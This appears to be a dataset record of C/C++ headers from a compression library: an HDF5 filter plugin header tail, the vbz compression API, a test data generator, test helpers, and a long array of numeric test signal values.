filter have a decoder? */ const char *name; /* Comment for debugging */ void* can_apply; /* The "can apply" callback for a filter */ void* set_local; /* The "set local" callback for a filter */ H5Z_func_t filter; /* The actual filter function */ } H5Z_class2_t; #ifdef __cplusplus } #endif #endif /* _H5PLextern_H */
3,562
C++
.h
70
48.357143
86
0.584483
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,168
vbz.h
nanoporetech_vbz_compression/vbz/vbz.h
#pragma once #include "vbz/vbz_export.h" #include <stdint.h> #if defined(__cplusplus) extern "C" { #endif #define VBZ_DEFAULT_VERSION 0 typedef uint32_t vbz_size_t; #define VBZ_ZSTD_ERROR ((vbz_size_t)-1) #define VBZ_STREAMVBYTE_INPUT_SIZE_ERROR ((vbz_size_t)-2) #define VBZ_STREAMVBYTE_INTEGER_SIZE_ERROR ((vbz_size_t)-3) #define VBZ_STREAMVBYTE_DESTINATION_SIZE_ERROR ((vbz_size_t)-4) #define VBZ_STREAMVBYTE_STREAM_ERROR ((vbz_size_t)-5) #define VBZ_VERSION_ERROR ((vbz_size_t)-6) #define VBZ_FIRST_ERROR VBZ_VERSION_ERROR struct CompressionOptions { // Flag to indicate the data should be converted to delta // then have zig zag encoding applied. // This causes similar signed numbers close to zero to end // up close to zero in unsigned space, and compresses better // when performing variable integer compression. bool perform_delta_zig_zag; // Used to select the variable integer compression technique // Should be one of 1, 2 or 4. // Using a level of 1 will cause no variable integer encoding // to be performed. unsigned int integer_size; // zstd compression to apply. // Should be in the range "ZSTD_minCLevel" to "ZSTD_maxCLevel". // 1 gives the best performance and still provides a sensible compression // higher numbers use more CPU time for higher compression ratios. // Passing 0 will cause zstd to not be applied to data. unsigned int zstd_compression_level; // version of vbz to apply. // Should be initialised to 'VBZ_DEFAULT_VERSION' for the best, newest compression. // of set to older values to decompress older streams. unsigned int vbz_version; }; /// \brief Find if a return value from a function is an error value. VBZ_EXPORT bool vbz_is_error(vbz_size_t result_value); /// \brief Find a string description for an error value VBZ_EXPORT char const* vbz_error_string(vbz_size_t error_value); /// \brief Find a theoretical max size for compressed output size. /// should be used to find the size of the destination buffer to allocate. /// \param source_size The size of the source buffer for compression in bytes. /// \param options The options which will be used to compress data. VBZ_EXPORT vbz_size_t vbz_max_compressed_size( vbz_size_t source_size, CompressionOptions const* options); /// \brief Compress data into a provided output buffer /// \param source Source data for compression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for compressed output. /// \param destination_capacity Size of the destination buffer to write to (see #max_compressed_size) /// \param options Options controlling compression to apply. /// \return The size of the compressed object in bytes, or an error code if something went wrong. VBZ_EXPORT vbz_size_t vbz_compress( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options); /// \brief Decompress data into a provided output buffer /// \param source Source compressed data for decompression. /// \param source_size Compressed Source data size (in bytes) /// \param destination Destination buffer for decompressed output. /// \param destination_size Size of the destination buffer to write to in bytes. /// This must be a multiple of integer_size, and equal to the number of /// expected output bytes exactly. The caller is expected to store this information alongside /// the compressed data. /// \param options Options controlling decompression to /// apply (must be the same as the arguments passed to #vbz_compress). /// \return The size of the decompressed object in bytes (will equal destination_size unless an error occurs). VBZ_EXPORT vbz_size_t vbz_decompress( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, CompressionOptions const* options); /// \brief Compress data into a provided output buffer, with the original size information stored. /// \note Must decompress data with #vbz_decompress_sized. /// \param source Source data for compression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for compressed output. /// \param destination_capacity Size of the destination buffer to write to (see #max_compressed_size) /// \param options Options controlling compression to apply. /// \return The size of the compressed object in bytes, or an error code if something went wrong. VBZ_EXPORT vbz_size_t vbz_compress_sized( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options); /// \brief Decompress data into a provided output buffer, using size information stored with the compressed data. /// \note Must decompress data stored with #vbz_compress_sized. /// \param source Source compressed data for decompression. /// \param source_size Compressed Source data size (in bytes) /// \param destination Destination buffer for decompressed output. /// \param destination_capacity Capacity of the destination buffer, should be at least #vbz_max_decompressed_size bytes. /// \param options Options controlling decompression to /// apply (must be the same as the arguments passed to #vbz_compress_sized). /// \return The size of the decompressed object in bytes, or an error code if something went wrong. VBZ_EXPORT vbz_size_t vbz_decompress_sized( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, CompressionOptions const* options); /// \brief Find the size for a decompressed block. /// should be used to find the size of the destination buffer to allocate for decompression. /// \param source Source compressed data for decompression. /// \param source_size The size of the compressed source buffer in bytes. /// \param options The options which will be used to decompress data. VBZ_EXPORT vbz_size_t vbz_decompressed_size( void const* source, vbz_size_t source_size, CompressionOptions const* options); #if defined(__cplusplus) } #endif
6,527
C++
.h
121
51.272727
121
0.71404
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,169
test_data_generator.h
nanoporetech_vbz_compression/vbz/perf/test_data_generator.h
#pragma once #include "../test/test_data.h" #include <gsl/gsl-lite.hpp> #include <numeric> #include <random> // Generator that targets a consistent number of bytes of increasing sequence. template <typename T> struct SequenceGenerator { static const std::size_t byte_target = 1000 * 1000; // 1mb static std::vector<std::vector<T>> generate(std::size_t& max_element_count) { std::vector<T> input_values(byte_target / sizeof(T)); max_element_count = input_values.size(); std::iota(input_values.begin(), input_values.end(), 0); return { input_values }; } }; // Generator that targets a random set of reads of random lengths. // // Under a maximum target byte count. template <typename T> struct SignalGenerator { static const std::size_t byte_target = 100 * 1000 * 1000; // 100 mb static std::vector<std::vector<T>> generate(std::size_t& max_element_count) { auto const seed = 5; static std::size_t max_element_count_static; static auto const generated_reads = do_generation(seed, max_element_count_static); max_element_count = max_element_count_static; return generated_reads; } private: static std::vector<std::vector<T>> do_generation(unsigned int seed, std::size_t& max_element_count) { std::random_device rd; std::default_random_engine rand(seed); std::uniform_int_distribution<std::uint32_t> length_dist(30000, 200000); std::size_t generated_bytes = 0; std::vector<std::vector<T>> results; while (generated_bytes < byte_target) { auto length = std::min<std::size_t>((byte_target-generated_bytes)/sizeof(T), length_dist(rand)); generated_bytes += length * sizeof(T); std::vector<T> input_values(length); max_element_count = std::max(max_element_count, input_values.size()); std::size_t idx = 0; for (auto& e : input_values) { auto input_data = test_data[idx]; e = (T)input_data; idx = (idx + 1) % test_data.size(); } results.push_back(input_values); } return results; } };
2,274
C++
.h
58
31.327586
108
0.624595
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,170
test_utils.h
nanoporetech_vbz_compression/vbz/test/test_utils.h
#pragma once #include <gsl/gsl-lite.hpp> #include <iostream> namespace { template <typename T, typename PrintType> class ContainerDumper { public: ContainerDumper(T const& t) : m_data(t) { } T const& m_data; }; template <typename PrintType, typename Container> std::ostream& operator<<(std::ostream &str, ContainerDumper<Container, PrintType> const& container) { str << "{ "; for (auto const& e : container.m_data) { str << PrintType(e) << ", "; } str << "}"; return str; } template <typename PrintType, typename Container> ContainerDumper<Container, PrintType> dump_explicit(Container const& c) { return ContainerDumper<Container, PrintType>{ c }; } template <typename Container> ContainerDumper<Container, typename Container::value_type> dump(Container const& c) { return ContainerDumper<Container, typename Container::value_type>{ c }; } }
911
C++
.h
36
22.416667
99
0.716263
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,171
test_data.h
nanoporetech_vbz_compression/vbz/test/test_data.h
#include <cstdint> #include <vector> std::vector<std::int16_t> test_data{ 546, 332, 342, 329, 314, 290, 297, 286, 303, 306, 298, 308, 329, 322, 311, 305, 304, 315, 306, 312, 311, 309, 310, 309, 320, 312, 315, 310, 295, 311, 317, 304, 318, 300, 307, 312, 319, 314, 323, 312, 325, 326, 318, 311, 313, 317, 298, 301, 281, 310, 301, 315, 322, 300, 325, 297, 297, 311, 306, 310, 302, 305, 300, 318, 313, 296, 311, 313, 305, 310, 305, 300, 317, 310, 307, 314, 314, 295, 308, 304, 306, 299, 310, 310, 303, 290, 303, 313, 304, 299, 284, 305, 309, 315, 297, 313, 313, 315, 298, 305, 312, 309, 307, 310, 302, 310, 318, 318, 307, 313, 321, 309, 316, 312, 294, 315, 317, 311, 307, 308, 323, 322, 317, 315, 319, 299, 307, 306, 314, 314, 316, 321, 325, 317, 307, 317, 311, 315, 301, 317, 322, 326, 316, 318, 307, 302, 331, 303, 317, 308, 321, 311, 299, 318, 301, 314, 322, 302, 302, 314, 326, 321, 310, 314, 303, 300, 303, 306, 326, 312, 304, 306, 307, 302, 319, 305, 298, 310, 303, 313, 299, 319, 319, 303, 314, 318, 309, 310, 304, 305, 312, 306, 308, 299, 325, 288, 310, 306, 306, 290, 306, 318, 326, 317, 306, 317, 315, 313, 313, 306, 324, 304, 313, 320, 309, 302, 309, 309, 307, 306, 292, 327, 298, 306, 311, 312, 311, 324, 319, 311, 306, 296, 311, 314, 306, 303, 315, 293, 310, 314, 310, 319, 310, 306, 307, 313, 328, 299, 304, 311, 313, 311, 304, 319, 316, 309, 306, 308, 314, 319, 304, 308, 321, 314, 313, 306, 292, 311, 315, 313, 316, 316, 316, 310, 303, 308, 300, 305, 308, 312, 295, 293, 310, 293, 312, 304, 301, 310, 316, 305, 320, 295, 316, 300, 293, 317, 315, 308, 297, 307, 302, 297, 276, 285, 285, 272, 290, 289, 285, 286, 347, 357, 336, 329, 344, 327, 340, 332, 330, 334, 340, 332, 329, 325, 322, 331, 371, 528, 540, 545, 528, 539, 543, 555, 544, 535, 503, 457, 439, 461, 452, 449, 444, 454, 464, 495, 450, 394, 383, 368, 373, 363, 251, 256, 255, 236, 247, 249, 239, 248, 243, 242, 244, 242, 253, 242, 250, 249, 244, 229, 222, 225, 236, 229, 224, 229, 215, 220, 227, 222, 212, 277, 348, 347, 312, 274, 272, 248, 244, 280, 255, 341, 377, 355, 374, 388, 374, 379, 386, 375, 373, 376, 363, 370, 347, 372, 304, 297, 321, 302, 306, 310, 337, 353, 348, 337, 307, 299, 293, 278, 295, 316, 297, 294, 294, 263, 294, 360, 353, 355, 356, 365, 355, 354, 356, 344, 330, 362, 375, 367, 382, 375, 376, 395, 395, 354, 336, 327, 335, 332, 318, 317, 337, 337, 330, 319, 313, 312, 326, 327, 327, 235, 195, 173, 189, 184, 332, 351, 334, 334, 321, 356, 393, 405, 403, 397, 394, 395, 376, 397, 377, 391, 399, 397, 388, 411, 384, 397, 415, 365, 353, 350, 363, 344, 345, 348, 374, 354, 355, 328, 263, 246, 245, 225, 212, 195, 190, 195, 206, 229, 224, 289, 333, 337, 351, 370, 338, 327, 350, 319, 316, 328, 322, 315, 329, 332, 330, 335, 341, 314, 276, 270, 254, 246, 245, 259, 249, 240, 266, 273, 254, 252, 393, 367, 387, 372, 383, 374, 405, 394, 312, 262, 258, 265, 260, 258, 262, 249, 271, 285, 297, 344, 367, 280, 254, 279, 380, 343, 358, 361, 347, 352, 368, 373, 369, 370, 351, 369, 374, 367, 312, 293, 302, 261, 277, 297, 363, 352, 363, 352, 332, 272, 289, 289, 287, 310, 288, 302, 272, 273, 281, 307, 314, 311, 288, 293, 301, 296, 311, 409, 411, 386, 346, 413, 379, 410, 344, 335, 330, 336, 340, 343, 333, 333, 330, 302, 292, 313, 309, 318, 319, 317, 321, 331, 322, 393, 455, 450, 447, 434, 426, 384, 315, 309, 333, 312, 297, 303, 295, 338, 356, 339, 342, 343, 341, 340, 360, 334, 335, 331, 346, 328, 332, 337, 321, 346, 352, 347, 345, 336, 359, 366, 335, 322, 284, 294, 289, 300, 297, 280, 286, 283, 292, 305, 310, 290, 289, 288, 290, 292, 306, 309, 261, 242, 265, 262, 257, 250, 260, 246, 256, 236, 260, 281, 277, 275, 292, 285, 289, 272, 265, 292, 293, 296, 284, 277, 286, 303, 296, 295, 284, 275, 272, 287, 273, 273, 268, 293, 279, 300, 271, 297, 286, 296, 290, 295, 295, 273, 272, 290, 292, 295, 277, 291, 303, 286, 295, 288, 301, 276, 282, 274, 272, 276, 253, 249, 246, 237, 240, 252, 240, 239, 250, 242, 245, 271, 278, 291, 273, 291, 279, 274, 274, 282, 275, 274, 288, 232, 250, 247, 231, 243, 241, 235, 238, 239, 181, 163, 165, 163, 178, 168, 185, 190, 182, 170, 170, 186, 197, 178, 180, 164, 179, 362, 343, 348, 365, 350, 350, 334, 342, 344, 347, 340, 329, 357, 369, 351, 332, 312, 313, 305, 310, 319, 336, 355, 360, 360, 354, 356, 356, 356, 306, 294, 304, 290, 321, 194, 168, 175, 179, 175, 197, 179, 192, 167, 177, 171, 179, 373, 352, 348, 327, 348, 292, 183, 220, 357, 345, 345, 372, 346, 351, 331, 358, 361, 340, 344, 368, 362, 403, 380, 367, 383, 390, 361, 410, 402, 401, 403, 401, 343, 324, 327, 322, 333, 328, 328, 319, 289, 289, 286, 293, 350, 399, 381, 405, 382, 390, 385, 380, 392, 386, 329, 295, 285, 283, 286, 298, 323, 281, 296, 280, 271, 277, 296, 285, 325, 308, 327, 318, 305, 304, 307, 294, 293, 316, 314, 428, 420, 410, 411, 407, 379, 400, 347, 363, 339, 331, 320, 318, 352, 438, 420, 432, 431, 412, 423, 417, 401, 377, 399, 345, 331, 325, 313, 318, 303, 318, 332, 320, 339, 308, 321, 346, 332, 344, 360, 342, 345, 344, 351, 360, 339, 349, 350, 336, 339, 359, 343, 335, 325, 334, 333, 331, 308, 289, 286, 291, 283, 286, 278, 268, 342, 393, 378, 373, 408, 387, 372, 385, 372, 378, 387, 391, 385, 377, 407, 361, 391, 388, 373, 377, 365, 401, 387, 399, 372, 284, 292, 289, 277, 284, 264, 281, 265, 278, 291, 381, 381, 396, 392, 375, 401, 387, 343, 324, 303, 242, 256, 251, 245, 245, 252, 242, 233, 228, 237, 243, 239, 226, 221, 238, 226, 199, 226, 239, 247, 251, 239, 228, 222, 238, 232, 231, 236, 238, 234, 231, 237, 254, 281, 278, 272, 269, 271, 250, 244, 268, 267, 262, 292, 332, 325, 313, 335, 303, 331, 308, 309, 336, 329, 333, 326, 322, 341, 324, 336, 349, 351, 351, 352, 343, 346, 328, 325, 322, 281, 273, 264, 274, 270, 264, 261, 273, 257, 215, 214, 229, 214, 231, 272, 290, 273, 250, 216, 211, 219, 217, 194, 218, 213, 206, 224, 201, 222, 201, 226, 211, 205, 211, 204, 211, 215, 212, 224, 231, 230, 262, 239, 262, 236, 265, 243, 264, 240, 242, 258, 291, 353, 342, 354, 360, 339, 331, 348, 348, 363, 347, 341, 352, 361, 351, 348, 356, 366, 372, 364, 377, 362, 368, 368, 389, 389, 397, 375, 375, 384, 384, 389, 397, 388, 390, 378, 392, 381, 380, 393, 382, 387, 386, 407, 369, 383, 380, 357, 359, 335, 326, 305, 323, 323, 289, 281, 256, 276, 261, 266, 272, 248, 247, 267, 268, 241, 246, 249, 265, 300, 285, 282, 304, 380, 362, 359, 345, 352, 247, 235, 263, 354, 356, 345, 362, 355, 253, 365, 227, 209, 206, 256, 425, 449, 436, 424, 442, 383, 340, 330, 339, 332, 335, 349, 368, 342, 348, 328, 332, 329, 324, 353, 386, 392, 390, 411, 392, 403, 396, 383, 317, 303, 295, 283, 285, 294, 214, 208, 209, 208, 193, 207, 199, 211, 219, 200, 220, 205, 209, 234, 248, 256, 259, 256, 266, 263, 249, 267, 363, 390, 385, 384, 365, 369, 356, 371, 368, 360, 363, 347, 328, 321, 307, 308, 267, 245, 275, 285, 271, 384, 446, 406, 424, 399, 428, 296, 230, 217, 214, 207, 215, 212, 233, 327, 359, 353, 361, 350, 368, 354, 364, 357, 336, 379, 407, 410, 402, 401, 423, 404, 422, 384, 360, 352, 362, 354, 360, 346, 355, 355, 365, 359, 370, 342, 358, 343, 364, 359, 360, 358, 362, 380, 366, 367, 383, 371, 375, 378, 368, 361, 380, 347, 316, 298, 279, 246, 247, 246, 243, 251, 249, 233, 250, 244, 247, 228, 229, 262, 237, 199, 176, 157, 169, 189, 163, 177, 164, 168, 163, 172, 168, 161, 170, 293, 362, 361, 371, 360, 362, 380, 376, 410, 412, 400, 408, 404, 401, 405, 389, 404, 396, 408, 402, 396, 410, 360, 322, 316, 315, 314, 313, 321, 312, 313, 322, 329, 308, 313, 314, 296, 326, 333, 325, 304, 351, 386, 389, 395, 382, 373, 380, 393, 377, 363, 348, 345, 325, 266, 269, 267, 276, 256, 271, 269, 266, 263, 231, 255, 270, 286, 315, 370, 392, 387, 406, 413, 408, 388, 367, 362, 369, 379, 357, 359, 358, 348, 373, 364, 364, 358, 381, 367, 366, 370, 363, 360, 356, 369, 367, 356, 369, 360, 362, 361, 360, 314, 288, 287, 272, 251, 256, 252, 259, 274, 273, 266, 270, 287, 390, 399, 379, 384, 383, 370, 370, 373, 372, 370, 373, 382, 363, 352, 361, 284, 304, 271, 230, 220, 215, 211, 204, 198, 206, 224, 202, 204, 213, 217, 216, 201, 210, 233, 197, 207, 250, 280, 264, 263, 224, 209, 210, 195, 209, 213, 205, 234, 260, 247, 255, 254, 248, 254, 268, 263, 248, 247, 267, 263, 259, 264, 257, 330, 380, 370, 368, 371, 355, 349, 347, 365, 329, 349, 346, 347, 334, 248, 247, 244, 248, 240, 245, 228, 206, 214, 222, 217, 236, 220, 336, 381, 395, 392, 378, 376, 385, 368, 377, 357, 385, 372, 373, 390, 288, 296, 272, 287, 293, 252, 271, 275, 272, 284, 263, 260, 259, 254, 260, 247, 257, 231, 243, 229, 222, 232, 226, 238, 240, 241, 233, 251, 258, 259, 267, 255, 246, 246, 248, 244, 248, 222, 249, 226, 204, 221, 242, 242, 227, 226, 243, 221, 243, 216, 231, 278, 298, 322, 350, 339, 331, 300, 262, 370, 463, 458, 463, 448, 453, 454, 429, 349, 355, 354, 349, 367, 360, 349, 369, 359, 356, 439, 443, 365, 351, 310, 298, 308, 309, 319, 311, 308, 290, 296, 293, 295, 353, 373, 377, 366, 376, 369, 364, 355, 365, 351, 371, 367, 350, 374, 372, 373, 381, 359, 367, 373, 376, 377, 353, 365, 358, 381, 353, 380, 381, 365, 368, 372, 380, 378, 349, 316, 306, 313, 281, 315, 314, 291, 267, 275, 269, 237, 272, 240, 248, 254, 256, 243, 252, 241, 246, 256, 256, 250, 250, 241, 231, 232, 228, 208, 224, 224, 242, 278, 281, 270, 277, 297, 276, 292, 291, 378, 385, 360, 364, 367, 367, 365, 381, 371, 382, 368, 376, 383, 380, 394, 387, 380, 351, 315, 335, 319, 346, 357, 363, 328, 332, 318, 328, 297, 300, 303, 308, 302, 282, 277, 272, 266, 270, 263, 259, 252, 253, 255, 258, 255, 207, 198, 253, 261, 267, 254, 283, 262, 259, 266, 262, 332, 372, 378, 324, 269, 313, 372, 376, 376, 363, 366, 372, 382, 329, 344, 341, 342, 356, 348, 334, 343, 370, 318, 339, 351, 345, 353, 345, 357, 324, 345, 331, 353, 352, 345, 346, 343, 325, 345, 349, 360, 353, 345, 355, 347, 348, 355, 357, 353, 339, 349, 345, 340, 338, 357, 355, 343, 362, 357, 342, 351, 351, 360, 355, 364, 331, 350, 363, 347, 351, 350, 353, 342, 343, 342, 347, 339, 343, 348, 344, 332, 332, 321, 320, 327, 333, 313, 381, 403, 426, 406, 396, 416, 400, 398, 366, 355, 388, 401, 379, 372, 387, 377, 368, 379, 363, 380, 385, 337, 315, 324, 312, 336, 288, 316, 302, 310, 305, 317, 305, 306, 309, 310, 320, 312, 318, 308, 334, 305, 327, 322, 306, 306, 297, 306, 307, 312, 283, 294, 311, 320, 300, 291, 386, 444, 453, 442, 454, 425, 443, 348, 346, 352, 352, 358, 349, 352, 343, 354, 339, 353, 345, 350, 346, 364, 367, 351, 371, 366, 381, 369, 370, 352, 342, 350, 331, 330, 354, 338, 355, 349, 256, 281, 267, 250, 248, 246, 250, 256, 261, 277, 277, 257, 267, 274, 278, 279, 279, 280, 270, 278, 274, 288, 223, 281, 279, 341, 364, 357, 382, 368, 355, 369, 363, 325, 338, 334, 331, 339, 335, 333, 307, 324, 345, 333, 338, 315, 323, 368, 384, 371, 375, 378, 372, 367, 358, 383, 317, 262, 272, 245, 248, 276, 267, 258, 275, 299, 280, 253, 244, 247, 241, 261, 255, 240, 211, 231, 227, 270, 460, 454, 456, 447, 352, 346, 340, 350, 352, 359, 355, 361, 347, 308, 288, 269, 299, 299, 283, 286, 286, 286, 304, 283, 278, 296, 278, 280, 289, 281, 376, 392, 382, 393, 392, 379, 380, 378, 378, 379, 362, 343, 370, 361, 381, 362, 371, 381, 361, 368, 366, 329, 281, 273, 268, 277, 267, 255, 265, 277, 271, 334, 339, 367, 393, 372, 402, 397, 400, 405, 398, 375, 397, 395, 389, 383, 389, 396, 397, 406, 385, 374, 385, 382, 397, 391, 364, 383, 392, 379, 343, 295, 302, 293, 309, 276, 337, 388, 408, 388, 403, 389, 389, 305, 279, 302, 295, 289, 288, 297, 280, 340, 347, 346, 357, 394, 366, 364, 344, 374, 367, 295, 330, 348, 354, 363, 386, 349, 375, 367, 366, 357, 351, 355, 365, 341, 272, 219, 230, 222, 224, 249, 230, 217, 218, 253, 231, 226, 212, 248, 233, 234, 215, 244, 243, 253, 246, 255, 251, 254, 256, 263, 252, 300, 350, 364, 364, 355, 355, 353, 347, 350, 363, 337, 265, 264, 272, 263, 281, 265, 335, 370, 366, 361, 345, 359, 359, 359, 359, 353, 350, 344, 356, 311, 313, 289, 314, 289, 271, 216, 213, 236, 222, 196, 215, 210, 201, 205, 219, 200, 218, 219, 241, 249, 256, 254, 251, 327, 326, 360, 355, 346, 349, 373, 350, 341, 357, 350, 307, 290, 316, 300, 310, 277, 267, 242, 252, 239, 223, 204, 192, 190, 156, 187, 195, 192, 187, 191, 349, 364, 355, 383, 390, 394, 370, 359, 301, 306, 298, 299, 285, 279, 280, 290, 302, 290, 381, 380, 409, 384, 391, 384, 343, 347, 333, 285, 329, 336, 335, 310, 324, 265, 262, 296, 295, 307, 321, 323, 310, 307, 337, 360, 334, 353, 335, 341, 288, 282, 283, 314, 343, 292, 269, 352, 294, 273, 279, 270, 260, 272, 256, 270, 325, 307, 256, 363, 464, 435, 468, 458, 441, 434, 389, 335, 319, 314, 317, 315, 316, 303, 342, 436, 430, 445, 432, 434, 430, 428, 424, 436, 419, 405, 400, 349, 339, 365, 396, 351, 343, 350, 361, 342, 337, 348, 342, 352, 351, 383, 387, 379, 386, 374, 353, 342, 366, 361, 361, 348, 313, 288, 324, 266, 251, 287, 288, 270, 292, 291, 286, 286, 300, 277, 296, 287, 298, 308, 292, 294, 300, 292, 287, 293, 298, 292, 369, 371, 386, 385, 325, 391, 366, 362, 366, 361, 363, 371, 356, 364, 364, 365, 363, 352, 346, 368, 362, 380, 364, 362, 364, 365, 373, 366, 372, 341, 333, 294, 292, 259, 247, 258, 237, 264, 248, 236, 247, 237, 232, 235, 216, 209, 210, 208, 205, 214, 231, 248, 242, 235, 239, 235, 253, 270, 279, 273, 284, 272, 278, 276, 293, 279, 336, 411, 250, 298, 312, 310, 314, 325, 315, 305, 338, 324, 335, 353, 373, 372, 360, 366, 358, 373, 356, 371, 358, 363, 348, 361, 355, 369, 336, 365, 353, 337, 346, 317, 334, 366, 346, 339, 311, 283, 288, 306, 319, 278, 304, 335, 328, 320, 319, 394, 363, 366, 367, 364, 379, 374, 335, 314, 313, 305, 319, 312, 315, 315, 322, 310, 310, 309, 318, 308, 317, 307, 318, 312, 324, 326, 313, 307, 313, 312, 355, 355, 354, 337, 348, 352, 359, 372, 401, 358, 368, 368, 373, 341, 301, 276, 278, 277, 297, 280, 273, 295, 359, 368, 378, 363, 340, 272, 264, 225, 226, 210, 215, 237, 222, 204, 225, 346, 364, 356, 300, 302, 300, 294, 283, 281, 275, 252, 233, 231, 249, 207, 227, 224, 219, 230, 213, 229, 198, 212, 220, 346, 439, 384, 348, 340, 322, 320, 309, 318, 311, 363, 372, 383, 385, 380, 392, 364, 384, 372, 367, 363, 363, 373, 373, 351, 380, 366, 322, 309, 320, 286, 350, 358, 386, 367, 376, 339, 283, 267, 280, 299, 298, 270, 297, 283, 256, 251, 243, 248, 253, 244, 238, 238, 203, 215, 200, 185, 213, 196, 251, 240, 230, 245, 240, 242, 248, 271, 284, 279, 271, 274, 285, 316, 329, 330, 323, 306, 306, 301, 318, 349, 346, 332, 345, 343, 346, 358, 367, 364, 349, 351, 355, 374, 348, 315, 286, 294, 271, 254, 272, 261, 273, 274, 275, 262, 322, 341, 348, 274, 291, 297, 270, 245, 271, 259, 249, 245, 260, 254, 268, 267, 269, 243, 269, 249, 257, 260, 211, 198, 202, 186, 235, 216, 186, 202, 199, 202, 200, 185, 208, 182, 189, 189, 200, 185, 197, 218, 217, 207, 223, 224, 207, 219, 200, 208, 385, 377, 374, 388, 391, 388, 371, 371, 396, 415, 422, 429, 411, 419, 413, 404, 418, 419, 371, 368, 357, 360, 364, 367, 401, 359, 404, 431, 428, 425, 415, 378, 359, 349, 356, 360, 366, 362, 352, 342, 306, 326, 296, 282, 287, 274, 221, 235, 315, 414, 404, 381, 401, 389, 390, 392, 379, 290, 288, 292, 276, 283, 256, 188, 180, 188, 202, 264, 262, 258, 409, 394, 411, 407, 383, 307, 290, 274, 281, 265, 282, 287, 258, 247, 253, 248, 252, 260, 252, 249, 266, 256, 251, 264, 243, 253, 261, 293, 382, 401, 380, 378, 380, 394, 389, 412, 375, 391, 309, 348, 262, 388, 340, 354, 338, 335, 340, 331, 327, 333, 328, 330, 334, 329, 327, 318, 308, 309, 311, 345, 337, 346, 344, 346, 354, 338, 349, 347, 337, 340, 331, 333, 343, 336, 342, 347, 335, 327, 343, 325, 341, 344, 342, 331, 334, 336, 339, 351, 331, 346, 338, 343, 333, 397, 389, 375, 403, 401, 397, 392, 381, 383, 386, 377, 390, 393, 378, 385, 397, 316, 311, 317, 309, 305, 322, 301, 287, 239, 236, 247, 238, 245, 220, 243, 245, 228, 241, 263, 258, 323, 343, 349, 346, 353, 345, 391, 397, 349, 334, 352, 346, 384, 403, 386, 378, 390, 369, 397, 371, 306, 264, 230, 156, 163, 162, 153, 165, 166, 160, 171, 152, 172, 159, 164, 174, 312, 308, 314, 306, 291, 333, 304, 304, 288, 329, 327, 324, 309, 342, 339, 336, 338, 348, 351, 348, 340, 353, 332, 346, 344, 347, 348, 345, 343, 355, 345, 341, 351, 354, 343, 343, 335, 306, 300, 278, 307, 308, 301, 305, 309, 309, 304, 298, 298, 318, 289, 292, 299, 304, 308, 305, 302, 293, 297, 316, 312, 327, 326, 319, 325, 327, 312, 302, 294, 277, 293, 272, 275, 265, 282, 385, 382, 386, 384, 376, 316, 296, 312, 300, 312, 304, 303, 310, 287, 297, 355, 389, 312, 318, 320, 301, 320, 317, 297, 317, 308, 319, 310, 333, 296, 211, 214, 230, 190, 207, 192, 202, 193, 211, 183, 200, 208, 206, 193, 195, 181, 188, 189, 202, 189, 204, 204, 220, 182, 343, 429, 436, 420, 437, 412, 419, 425, 417, 427, 428, 413, 426, 411, 434, 422, 421, 419, 418, 420, 423, 348, 337, 342, 334, 322, 328, 313, 324, 327, 366, 393, 369, 365, 372, 366, 353, 299, 265, 299, 276, 279, 283, 284, 293, 281, 274, 262, 279, 280, 287, 271, 262, 283, 267, 281, 322, 336, 331, 325, 355, 317, 270, 312, 327, 333, 336, 372, 346, 351, 326, 314, 324, 340, 330, 340, 324, 337, 307, 299, 298, 287, 304, 299, 372, 407, 344, 332, 369, 325, 352, 319, 304, 335, 303, 245, 233, 249, 239, 229, 249, 289, 299, 291, 298, 349, 391, 392, 347, 308, 319, 301, 301, 306, 292, 314, 307, 283, 283, 308, 281, 299, 302, 314, 305, 317, 335, 364, 360, 386, 371, 377, 309, 283, 277, 304, 294, 291, 290, 299, 286, 283, 207, 210, 211, 206, 229, 203, 220, 208, 194, 201, 201, 199, 179, 205, 183, 196, 200, 189, 190, 205, 202, 199, 201, 195, 191, 265, 381, 348, 314, 405, 403, 379, 345, 326, 220, 232, 232, 281, 340, 338, 334, 352, 349, 339, 345, 334, 343, 348, 347, 398, 384, 396, 407, 401, 396, 409, 393, 368, 385, 361, 365, 354, 278, 317, 279, 260, 276, 331, 262, 262, 273, 271, 284, 261, 276, 254, 269, 280, 273, 271, 256, 259, 267, 267, 273, 330, 402, 442, 421, 414, 394, 397, 405, 422, 331, 329, 319, 306, 332, 311, 309, 316, 332, 355, 337, 334, 293, 325, 310, 320, 285, 249, 231, 265, 257, 247, 262, 256, 252, 217, 244, 330, 389, 385, 410, 401, 409, 369, 377, 374, 399, 382, 381, 364, 296, 301, 305, 293, 309, 298, 319, 305, 297, 284, 289, 300, 320, 439, 399, 428, 419, 403, 419, 440, 422, 428, 429, 413, 399, 295, 260, 258, 256, 256, 261, 246, 270, 279, 266, 247, 268, 305, 383, 382, 387, 360, 381, 372, 388, 379, 382, 384, 373, 385, 385, 387, 317, 274, 267, 266, 276, 252, 268, 249, 272, 247, 248, 259, 255, 262, 381, 372, 356, 253, 259, 367, 377, 378, 394, 381, 371, 362, 340, 275, 253, 301, 373, 374, 357, 380, 398, 372, 365, 351, 355, 362, 379, 363, 259, 264, 256, 262, 371, 381, 363, 381, 370, 349, 385, 377, 382, 373, 379, 384, 371, 377, 357, 375, 370, 387, 389, 385, 398, 379, 377, 359, 359, 377, 359, 370, 366, 369, 373, 368, 376, 327, 260, 273, 297, 284, 265, 256, 238, 271, 329, 380, 366, 369, 387, 376, 376, 371, 363, 354, 373, 356, 363, 368, 361, 342, 335, 338, 328, 329, 335, 327, 306, 329, 332, 354, 378, 356, 362, 359, 370, 360, 353, 359, 371, 371, 350, 368, 363, 334, 